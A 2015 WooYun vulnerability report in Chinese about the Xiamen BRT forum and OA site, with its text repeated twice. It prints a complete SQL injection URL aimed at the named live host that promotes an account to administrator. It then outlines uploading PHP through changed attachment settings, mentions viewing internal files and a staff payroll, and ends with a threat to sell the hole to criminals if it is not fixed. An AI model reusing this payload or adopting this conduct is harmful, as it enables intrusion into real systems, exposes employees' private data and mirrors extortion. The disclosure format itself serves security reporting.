当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131070

漏洞标题:厦门快速公交论坛存在漏洞拿下oa/bbs控制权

相关厂商:brtxm.com

漏洞作者: 赐给我个漂亮的女朋友

提交时间:2015-08-03 11:06

修复时间:2015-09-17 11:08

公开时间:2015-09-17 11:08

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

各种OA文档资料,项目资料,简历,辞职啥的,国税缴交啊等!

详细说明:

1.png


转到BBS

2.png


Powered by Discuz!NT
存在SQL注入漏洞
例:http://wooyun.org/bugs/wooyun-2010-04477
将自己提升为管理员

http://www.brtxm.com:8888/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27qwezxcasd%27%27%27%29--


3.png


成功
转而进入后台
修改附件格式
添加PHP
然后你懂的

6.png


7.png


8.png


无意间看到一份2010年的工资单
这也太少了吧

9.png


漏洞证明:

1.png


转到BBS

2.png


Powered by Discuz!NT
存在SQL注入漏洞
例:http://wooyun.org/bugs/wooyun-2010-04477
将自己提升为管理员

http://www.brtxm.com:8888/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27qwezxcasd%27%27%27%29--


3.png


成功
转而进入后台
修改附件格式
添加PHP
然后你懂的

6.png


7.png


8.png


无意间看到一份2010年的工资单
这也太少了吧

9.png


修复方案:

不知,过几天不修复就卖给黑产

版权声明:转载请注明来源 赐给我个漂亮的女朋友@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)